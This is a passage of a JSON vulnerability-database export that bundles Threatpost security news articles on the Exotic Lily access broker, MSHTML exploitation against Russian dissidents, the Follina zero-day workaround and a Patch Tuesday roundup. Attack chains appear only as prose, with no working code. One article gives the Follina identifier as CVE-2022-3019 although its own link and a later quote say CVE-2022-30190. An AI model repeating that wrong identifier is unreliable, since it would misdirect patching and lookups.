ostensibly as a full-time cybercrime business, which might be described as a \u201csoup to nuts\u201d organization if it were actually a legitimate company.\n\nThe group has maintained a \u201crelatively consistent attack chain\u201d during the time it was being tracked by researchers with its operators \u201cworking a fairly typical 9-to-5 job, with very little activity during the weekends,\u201d researchers wrote. Working hours indicated that the group is likely operating out of a Central or Eastern European time zone.\n\nThe group\u2019s tactics include initial activity to build fake online personas\u2014including social-media profiles with AI-generated photos\u2014that spoof both identities and company domains to ensure it appears as an authentic entity to its targets when carrying out phishing, researchers revealed.\n\nIn fact, in November, Google TAG observed the group impersonating real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.\n\n\u201cIn the majority of cases, a spoofed domain name was identical to a real domain name of an existing organization, with the only difference being a change of TLD to \u201c.us\u201d, \u201c.co\u201d or \u201c.biz,\u201d researchers wrote.\n\n## **Full-Time Phishing Business**\n\nWhile bug exploitation is part of its work as noted, Exotic Lily\u2019s main business operation is to use these spoofed email accounts to send [spear-phishing](<https://threatpost.com/spear-phishing-exploits-glitch-steal-credentials/176449/>) emails. They often purport to be a business proposal, such as seeking to outsource a software-development project or an information-security service.\n\nOne unique aspect of the group\u2019s method is to engage in more follow-up communications with targets than most cybercriminals behind phishing campaigns typically do, researchers observed. This activity includes operators\u2019 attempting to schedule a meeting to discuss a project\u2019s design or requirements or engaging in other communication to gain affinity and trust, they said.\n\nIn its final attack stage, Exotic Lily uploads an ultimate payload to a public file-sharing service such as TransferNow, TransferXL, WeTransfer or OneDrive, and then uses a built-in email notification feature to share the file with the target.\n\nThis tactic serves to help the group\u2019s malicious motives evade detection, as the final email originates from the email address of a legitimate file-sharing service and not the attacker\u2019s email, researchers noted.\n\n## **Payload Delivery**\n\nTypically, the actors upload another group\u2019s malware to the file-sharing service prior to sharing it with the target, researchers said. While some samples of malware appear custom, Google TAG doesn\u2019t think it\u2019s Exotic Lily who\u2019s developing these binaries.\n\nThough their first observation of the group was the use of documents exploiting the MSHTML bug, researchers later observed Exotic Lily changing its delivery tactics to use ISO archives that include shortcuts to the [BazarLoader dropper](<https://threatpost.com/bazarloader-malware-slack-basecamp/165455/>), according to the post.\n\nThis month, Google observed the group delivering ISO files with a custom loader that drops malware dubbed Bumblebee, which uses Windows Management Instrumentation (WMI) to collect various system details such as OS version, username and domain name. These details are then exfiltrated in JSON format to a command-and-control server (C2), researchers said.\n\nBumblebee also can execute commands and code from the C2, and in recent activity was seen fetching Cobalt Strike payloads to be executed on targeted systems, they added.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T14:49:01", "type": "threatpost", "title": "Google Blows Lid Off Conti, Diavol Ransomware Access-Broker Ops", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-03-18T14:49:01", "id": "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "href": "https://threatpost.com/google-conti-diavol-ransomware-access-broker/178981/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T15:11:13", "description": "A [spearphishing](<https://threatpost.com/spearphishing-attack-spoofs-microsoft-office-365/162001/>) campaign targeting Russian citizens and government entities that are not aligned with the actions of the Russian government is the latest in numerous threats that have emerged since Russia invaded the Ukraine in February.\n\nResearchers from MalwareBytes identified a campaign last week that targets entities using websites, social networks, instant messengers and VPN services banned by the Kremlin, according [to a blog post](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>) published Tuesday by Hossein Jazi, manager, threat intelligence analyst at MalwareBytes.\n\nTargets are receiving various emails that they will face charges due to this activity, with a lure to open a malicious attachment or link to find out more, Jazi wrote. The messages purport to be from the \u201cMinistry of Digital Development, Telecommunications and Mass Communications of the Russian Federation\u201d and the \u201cFederal Service for Supervision of Communications, Information Technology and Mass Communications,\u201d he said.\n\nMalwareBytes observed two documents associated with the campaign using the previously identified flaw [dubbed MSHTML](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>) and tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The flaw, which [has been patched](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>), is a remote-code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\n\u201cEven though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability,\u201d Jazi wrote.\n\nMoreover, the threat actor used a new variant of an MSHTML exploit called CABLESS in the campaign, researchers said. [Sophos](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) previously reported an attack that used this variant; however, in that case the actor did not use an RTF file, Jazi observed in the post.\n\nThe campaign also deviates from most other cyber threats that have arisen since Russia invaded Ukraine on Feb. 24, which typically tend to attack [targets in Ukraine](<https://threatpost.com/destructive-wiper-organizations-ukraine/178937/>) or others sympathetic to the war-torn country\u2019s cause.\n\n## **Attack Sequence**\n\nResearchers intercepted a number of emails being used in campaigns, all of which are in the Russian language. One in particular that they observed is a letter to a target about limitation of access to the Telegram application in Russia, according to the post.\n\nThe email includes an RTF with an embedded url that downloads an HTML file that exploits the MSHTML bug, researchers said. The HTML file contains a script that executes the script in Windows Script Host (WSF) data embedded in the RTF file, which contains a JavaScript code that can be accessed from a remote location.\n\n\u201cIn this case, this data has been accessed using the downloaded HTML exploit file,\u201d Jazi explained. \u201cExecuting this script leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim\u2019s machine.\u201d\n\n## **Potentially CarbonSpider at Work?**\n\nResearchers are unsure who is behind the campaign but noted the similarity of the lure as one used before and linked to the threat group [CarbonSpider](<https://prod.adversary.crowdstrike.cloud.jam3.net/en-US/adversary/carbon-spider/>), which in the past has targeted Russian financial institutions.\n\nA previous CarbonSpider campaign also used an email template claiming to be from the Federal Service for Supervision of Communications, Information Technology and Mass Communications as a lure, according to the post. In that campaign, the threat actor deployed a PowerShell-based remote-access trojan (RAT) in an obfuscated PowerShell script that used a combination of Base64 and custom obfuscation, according to the post.\n\nHidden inside the script was a RAT that could move the attack to the next stage and execute various payloads, including a JavaScript, PowerShell, Executable or DLL.\n\n\u201cThis RAT starts its activity by setting up some configurations which include the [command-and-control, or C2] URL, intervals, debug mode and a parameter-named group that initialized with \u2018Madagascar\u2019 which probably is the alias of the threat actor,\u201d Jazi wrote.\n\nBased on MalwareBytes\u2019 observations of the domains targeted in the campaign, potential victims are from a number of regional and federal government organizations, including: the authorities of the Chuvash Republic Official internet portal; the Russian Ministry of Internal Affairs; the Ministry of Education and Science of the Republic of Altai; the Ministry of Education of the Stavropol Territory; the Minister of Education and Science of the Republic of North Ossetia-Alania; and the Ministry of Science and Higher Education of the Russian Federation.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T13:13:49", "type": "threatpost", "title": "MSHTML Flaw Exploited to Attack Russian Dissidents", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-03-30T13:13:49", "id": "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "href": "https://threatpost.com/mshtml-flaw-exploited-to-attack-russian-dissidents/179150/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-02T16:46:30", "description": "Microsoft has released a workaround for [a zero-day flaw](<https://threatpost.com/zero-day-follina-bug-lays-older-microsoft-office-versions-open-to-attack/179756/>) that was initially flagged in April and that attackers already have used to target organizations in Russia and Tibet, researchers said.\n\nThe remote control execution (RCE) flaw, tracked as [CVE-2022-3019](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), is associated with the Microsoft Support Diagnostic Tool (MSDT), which, ironically, itself collects information about bugs in the company\u2019s products and reports to Microsoft Support.\n\n\u201cA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\u201d Microsoft explained in [its guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on the Microsoft Security Response Center. \u201cAn attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nMicrosoft\u2019s workaround comes some six weeks after the vulnerability was apparently first identified. Researchers from [Shadow Chaser Group](<https://twitter.com/ShadowChasing1?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) noticed it on April 12 in [a bachelor\u2019s thesis from August 2020](<https://benjamin-altpeter.de/doc/thesis-electron.pdf>)\u2014with attackers apparently targeting Russian users\u2013and reported to Microsoft on April 21, according to research firm Recorded Future\u2019s [The Record](<https://therecord.media/microsoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet/>).\n\nA Malwarebytes Threat Intelligence analyst also spotted the flaw back in April but could not fully identify it, the company said [in a post on Twitter](<https://twitter.com/MBThreatIntel/status/1531398009103142912?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1531398009103142912%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Ftherecord.media%2Fmicrosoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet%2F>) over the weekend, retweeting the [original post](<https://twitter.com/h2jazi/status/1513870903590936586>) about the vulnerability, also made on April 12, from [@h2jazi](<https://twitter.com/h2jazi>).\n\nWhen the flaw was reported, Microsoft didn\u2019t consider it an issue. It\u2019s clear now that the company was wrong, and the vulnerability again raised the attention of researchers at Japanese security vendor Nao Sec, who[ tweeted a fresh warning](<https://twitter.com/nao_sec/status/1530196847679401984>) about it over the weekend, noting that it was being used to target users in Belarus.\n\nIn analysis over the weekend noted security researcher Kevin Beaumont [dubbed the vulnerability](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) \u201cFollina,\u201d explaining the zero-day code references the Italy-based area code of Follina \u2013 0438.\n\n## **Current Workaround**\n\nWhile no patch yet exists for the flaw, Microsoft is recommending that affected users disable the MSDT URL to mitigate it for now. This \u201cprevents troubleshooters being launched as links including links throughout the operating system,\u201d the company wrote in their advisory.\n\nTo do this, users must follow these steps: Run \u201c:**Command Prompt**** as Administrator****\u201c**; Back up the registry key by executing the command \u201creg export HKEY_CLASSES_ROOT\\ms-msdt _filename_\u201c; and execute the command \u201creg delete HKEY_CLASSES_ROOT\\ms-msdt /f\u201d.\n\n\u201cTroubleshooters can still be accessed using the [Get Help application](<https://apps.microsoft.com/store/detail/get-help/9PKDZBMV1H3T?hl=en-us&gl=US>) and in system settings as other or additional troubleshooters,\u201d the company said.\n\nMoreover, if the calling application is an Office app then by default, Office opens the document from the internet in Protected View and Application Guard for Office, \u201cboth of which prevent the current attack,\u201d Microsoft said. However, Beaumont refuted that assurance in his analysis of the bug.\n\nMicrosoft also plans to update CVE-2022-3019 with further information but did not specify when it would do so, according to the advisory.\n\n## **Significant Risk**\n\nIn the meantime, the unpatched flaw poses a significant risk for a number of reasons, Beaumont and other researchers noted.\n\nOne is that it affects such a wide swathe of users, given that it exists in all currently supported Windows versions and can be exploited via Microsoft Office versions 2013 through Office 2019, Office 2021, Office 365, and Office ProPlus.\n\n\u201cEvery organization that is dealing with content, files and in particular Office documents, which is basically everyone in the globe, is currently exposed to this threat,\u201d Aviv Grafi, CTO and founder of security firm [Votiro](<https://votiro.com/>), wrote in an e-mail to Threatpost.\n\nAnother reason the flaw poses a major threat is its execution without action from end users, both Beaumont and Grafi said. Once the HTML is loaded from the calling application, an MSDT scheme is used to execute a PowerShell code to run a malicious payload, Grafi explained.\n\nSince the flaw is abusing the remote template feature in Microsoft Word, it is not dependent on a typical macro-based exploit path, which are common within Office-based attacks, Beaumont said.\n\n\u201cWhat makes this vulnerability so difficult to avoid is the fact that the end user does not have to enable macros for the code to execute, making it a \u2018zero-click\u2019 remote code execution technique used through MSDT,\u201d Grafi concurred.\n\n## **Under Active Attack**\n\nClaire Tills, senior research engineer for security firm Tenable, compared the flaw to last year\u2019s zero-click [MSHTML bug](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>)**, **tracked as [CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>), which was pummeled by attackers, including the [Ryuk ransomware gang](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>).\n\n\u201cGiven the similarities between CVE-2022-30190 and CVE-2021-40444, and that researchers speculate other protocol handlers may also be vulnerable, we expect to see further developments and exploitation attempts of this issue,\u201d she wrote in an e-mail to Threatpost.\n\nIndeed, threat actors already have pounced on the vulnerability. On Monday, Proofpoint Threat Insight also [tweeted](<https://twitter.com/threatinsight/status/1531688214993555457>) that threat actors were using the flaw to target organizations in Tibet by impersonating the \u201cWomen Empowerments Desk\u201d of the Central Tibetan Administration.\n\nWhat\u2019s more, the workaround that Microsoft currently offers itself has issues and won\u2019t provide much of a fix in the long-term, especially with the bug under attack, Grafi said. He said the workaround is\u201dnot friendly for admins\u201d because it involves \u201cchanges in the Registry of the end user\u2019s endpoints.\u201d\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T10:38:37", "type": "threatpost", "title": "Microsoft Releases Workaround for \u2018One-Click\u2019 0Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-3019", "CVE-2022-30190"], "modified": "2022-06-01T10:38:37", "id": "THREATPOST:4C8D995307A845304CF691725B2352A2", "href": "https://threatpost.com/microsoft-workaround-0day-attack/179776/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-16T18:44:44", "description": "In [September\u2019s Patch Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability>) crop of security fixes, Microsoft released patches for 66 CVEs, three of which are rated critical, and one of which \u2013 the Windows MSHTML zero-day \u2013 has been under active attack for nearly two weeks.\n\nOne other bug is listed as publicly known but isn\u2019t (yet) being exploited. Immersive Labs\u2019 Kevin Breen, director of cyber threat research, observed that with only one CVE under active attack in the wild, it\u2019s \u201cquite a light Patch Tuesday\u201d \u2013 at least on the surface, that is.\n\nThe flaws were found in Microsoft Windows and Windows components, Microsoft Edge (Chromium, iOS, and Android), Azure, Office and Office Components, SharePoint Server, Microsoft Windows DNS and the Windows Subsystem for Linux.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nOf the 66 new CVEs patched today, three are rated critical, 62 are rated important, and one is rated moderate in severity.\n\nOver the past nine months of 2021, this is the seventh month in which Microsoft patched fewer than 100 CVEs, in stark contrast to 2020, when Redmond spent eight months gushing out more than 100 CVE patches per month. But while the overall number of vulnerabilities is lighter, the severity ratings have ticked up, as the [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2021/9/14/the-september-2021-security-update-review-kpgpb>) noted.\n\nSome observers pegged the top patching priority in this month\u2019s batch as being a fix for CVE-2021-40444: An important-rated vulnerability in Microsoft\u2019s MSHTML (Trident) engine that rates 8.8 out of 10 on the CVSS scale.\n\nDisclosed on Sept. 7, it\u2019s a painfully throbbing sore thumb, given that researchers developed a number of proof-of-concept (PoC) exploits showing how drop-dead simple it is to exploit, and attackers have been sharing guides on how to do just that.\n\n## Under Active Attack: CVE-2021-40444\n\nIt\u2019s been nearly two weeks since this serious, simple to exploit bug has been under active attack, and it\u2019s been nearly a week since attackers started to share blueprints on how to carry out an exploit.\n\nMicrosoft said last week that the flaw could let an attacker \u201ccraft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine,\u201d after which \u201cthe attacker would then have to convince the user to open the malicious document.\u201d Unfortunately, malicious macro attacks continue to be prevalent: In July, for example, legacy users of Microsoft Excel were being targeted in a malware campaign that used a [novel malware-obfuscation technique](<https://threatpost.com/microsoft-office-malware-protection-bypass/167652/>) to disable malicious macro warnings and deliver the ZLoader trojan.\n\nAn attacker would need to convince a user to open a specially crafted Microsoft Office document containing the exploit code.\n\nSatnam Narang, staff research engineer at Tenable, noted via email that there have been warnings that this vulnerability will be incorporated into malware payloads and used to distribute ransomware: A solid reason to put the patch at the top of your priority list.\n\n\u201cThere are no indications that this has happened yet, but with the patch now available, organizations should prioritize updating their systems as soon as possible,\u201d Narang told Threatpost.\n\nLast Wednesday, Sept. 8, [Kevin Beaumont](<https://twitter.com/GossiTheDog/status/1435515875025633282>) \u2013 head of the security operations center for U.K. fashion retailer Arcadia Group and a past senior threat intelligence analyst at Microsoft \u2013 [noted](<https://twitter.com/GossiTheDog/status/1435562870331293706>) that the exploit had been in the wild for about a week or more.\n\nIt got worse: Last Thursday, Sept. 9, threat actors began [sharing exploit how-tos](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-exploits-shared-on-hacking-forums/>) and PoCs for the Windows MSHTML zero-day. BleepingComputer gave it a try and found that the guides are \u201csimple to follow and [allow] anyone to create their own working version\u201d of the exploit, \u201cincluding a Python server to distribute the malicious documents and CAB files.\u201d\n\nIt took the publication all of 15 minutes to recreate the exploit.\n\nA week ago, on Tuesday, Sept. 7, Microsoft and the Cybersecurity and Infrastructure Security Agency (CISA) had [urged mitigations](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) of the remote-code execution (RCE) flaw, which is found in all modern Windows operating systems.\n\nLast week, the company didn\u2019t say much about the bug in MSHTML, aka Trident, which is the HTML engine built into Windows since Internet Explorer debuted more than 20 years ago and which allows Windows to read and display HTML files.\n\nMicrosoft did say, however, that it was aware of targeted attacks trying to exploit it via specially crafted Microsoft Office documents.\n\nIn spite of there being no security updates available for the vulnerability at that time, MIcrosoft went ahead and disclosed it, along with mitigations meant to help prevent exploitation.\n\n## Mitigations That Don\u2019t Mitigate\n\nTracked as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), the flaw is serious enough that CISA sent its own advisory, alerting users and administrators and recommending that they use the mitigations and workarounds Microsoft recommended \u2013 mitigations that try to prevent exploitation by blocking ActiveX controls and Word/RTF document previews in Windows Explorer.\n\nEmphasis on \u201ctry to:\u201d Unfortunately, those mitigations proved to be less than foolproof, as researchers, including Beaumont, managed to [modify the exploit](<https://twitter.com/GossiTheDog/status/1435570418623070210>) so that it didn\u2019t use ActiveX, [effectively skirting Microsoft\u2019s mitigations](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-defenses-bypassed-as-new-info-emerges/>).\n\nThe Zero Day Initiative [said that](<https://www.zerodayinitiative.com/blog/2021/9/14/the-september-2021-security-update-review-kpgpb>) for now, the most-effective defense is \u201cto apply the patch and avoid Office docs you aren\u2019t expecting to receive.\u201d\n\nBe sure to carefully review and install [all the needed patches](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for your setup: There\u2019s a long list of updates for specific platforms, and it\u2019s important not to slather on too thin a layer of protection.\n\nCredit for finding this bug goes to Rick Cole of MSTIC; Bryce Abdo, Dhanesh Kizhakkinan and Genwei Jiang, all from Mandiant; and Haifei Li of EXPMON.\n\n## Baddest Bug Award\n\nThe award for baddest bug \u2013 or at least, the one with the highest severity rating, with a CVSS score of 9.8 \u2013 goes to [CVE-2021-38647](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>): a critical remote-code execution (RCE) vulnerability in Open Management Infrastructure.\n\n[OMI is an open-source project](<https://github.com/microsoft/omi>) to further the development of a production-quality implementation of the [DMTF CIM/WBEM](<https://www.dmtf.org/standards/cim>) standards.\n\n\u201cThis vulnerability requires no user interaction or privileges, so an attacker can run their code on an affected system just by sending a specially crafted message to an affected system,\u201d the Zero Day Initiatve explained. That makes it high priority: ZDI recommended that OMI users test and deploy this one quickly.\n\n## Yet More PrintNightmare Patches\n\nMicrosoft also patched three elevation of privilege vulnerabilities in Windows Print Spooler ([CVE-2021-38667](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38667>), [CVE-2021-38671](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38671>) and [CVE-2021-40447](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40447>)), all rated important.\n\nThese are the three latest fixes in a steady [stream](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>) of [patches](<https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/>) for flaws in Windows Print Spooler that followed the [disclosure of PrintNightmare](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>) in June. This probably won\u2019t be the last patch in that parade: Tenable\u2019s Narang told Threatpost that \u201cresearchers continue to discover ways to exploit Print Spooler\u201d and that the firm expects \u201ccontinued research in this area.\u201d\n\nOnly one \u2013 CVE-2021-38671 \u2013 of today\u2019s patch trio is rated as \u201cexploitation more likely.\u201d Regardless, organizations should prioritize patching these flaws as \u201cthey are extremely valuable to attackers in post-exploitation scenarios,\u201d Narang observed.\n\n## More \u2018Exploitation More Likely\u2019\n\nImmersive\u2019s Breen told Threatpost that a trio of local privilege-escalation vulnerabilities in the Windows Common Log File System Driver ([CVE-2021-36955](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36955>), [CVE-2021-36963](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36963>), [CVE-2021-38633](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38633>)) are also noteworthy, all of them being listed as \u201cexploitation more likely.\u201d\n\n\u201cLocal priv-esc vulnerabilities are a key component of almost every successful cyberattack, especially for the likes of ransomware operators who abuse this kind of exploit to gain the highest level of access,\u201d Breen said via email. \u201cThis allows them to disable antivirus, delete backups and ensure their encryptors can reach even the most sensitive of files.\u201d\n\nOne glaring example of that emerged in May, when hundreds of millions of [Dell users were found to be at risk](<https://threatpost.com/dell-kernel-privilege-bugs/165843/>) from kernel-privilege bugs. The bugs lurked undisclosed for 12 years, and could have allowed attackers to bypass security products, execute code and pivot to other parts of the network for lateral movement.\n\nThe three exploits Microsoft patched on Tuesday aren\u2019t remote, meaning that attackers need to have achieved code execution by other means. One such way would be via CVE-2021-40444.\n\nTwo other vulnerabilities \u2013 [CVE-2021-38639](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38639>) and [CVE-2021-36975](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36975>), both Win32k escalation of privilege flaws \u2013 have also been listed as \u201cexploitation more likely\u201d and, together, cover the full range of supported Windows versions.\n\nBreen said that he\u2019s starting to feel like a broken record when it comes to privilege escalation vulnerabilities. They\u2019re not rated as high a severity risk as RCE bugs, but \u201cthese local exploits can be the linchpin in the post-exploitation phases of an experienced attacker,\u201d he asserted. \u201cIf you can block them here you have the potential to significantly limit their damage.\u201d\n\nhe added, \u201cIf we assume a determined attacker will be able to infect a victim\u2019s device through social engineering or other techniques, I would argue that patching priv-esc vulnerabilities is even more important than patching some other remote code-execution vulns,\u201d Breen said.\n\n## Still, This RCE Is Pretty Important\n\nDanny Kim, a principal architect at Virsec who spent time at Microsoft during his graduate work on the OS security development team, wants security teams to pay attention to [CVE-2021-36965](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36965>) \u2013 an important-rated Windows WLAN AutoConfig Service RCE vulnerability \u2013 given its combination of severity (with a CVSS:3.0 base score of 8.8); no requirement for privilege escalation/user interaction to exploit; and breadth of affected Windows versions.\n\nThe WLAN AutoConfig Service is part of the mechanism that Windows 10 uses to choose the wireless network a computer will connect to, and to the Windows Scripting Engine, respectively.\n\nThe patch fixes a flaw that could allow network-adjacent attackers to run their code on affected systems at system level.\n\nAs the Zero Day Initiative explained, that means an attacker could \u201ccompletely take over the target \u2013 provided they are on an adjacent network.\u201d That would come in quite handy in a [coffee-shop attack](<https://threatpost.com/microsoft-wi-fi-protection/145053/>), where multiple people use an unsecured Wi-Fi network.\n\nThis one \u201cis especially alarming,\u201d Kim said: Think [SolarWinds](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) and PrintNightmare.\n\n\u201cAs recent trends have shown, remote code execution-based attacks are the most critical vulnerabilities that can lead to the largest negative impact on an enterprise, as we have seen in the Solarwinds and PrintNightmare attacks,\u201d he said in an email.\n\nKim said that in spite of the exploit code maturity being currently unproven, the vulnerability has been confirmed to exist, leaving an opening for attackers.\n\n\u201cIt specifically relies on the attacker being located in the same network, so it would not be surprising to see this vulnerability used in combination with another CVE/attack to achieve an attacker\u2019s end goal,\u201d he predicted. \u201cRemote code execution attacks can lead to unverified processes running on the server workload, only highlighting the need for constant, deterministic runtime monitoring. Without this protection in place, RCE attacks can lead to a total loss of confidentiality and integrity of an enterprise\u2019s data.\u201d\n\nThe Zero Day Initiative also found this one alarming. Even though it requires proximity to a target, it requires no privileges or user interaction, so \u201cdon\u2019t let the adjacent aspect of this bug diminish the severity,\u201d it said. \u201cDefinitely test and deploy this patch quickly.\u201d\n\n## And Don\u2019t Forget to Patch Chrome\n\nBreen told Threatpost via email that security teams should also pay attention to 25 vulnerabilities patched in Chrome and ported over to Microsoft\u2019s Chromium-based Edge.\n\nBrowsers are, after all, windows into things both private, sensitive and valuable to criminals, he said.\n\n\u201cI cannot underestimate the importance of patching your browsers and keeping them up to date,\u201d he stressed. \u201cAfter all, browsers are the way we interact with the internet and web-based services that contain all sorts of highly sensitive, valuable and private information. Whether you\u2019re thinking about your online banking or the data collected and stored by your organization\u2019s web apps, they could all be exposed by attacks that exploit the browser.\u201d\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on September 22 at 2 PM EST with Cybersixgill\u2019s Sumukh 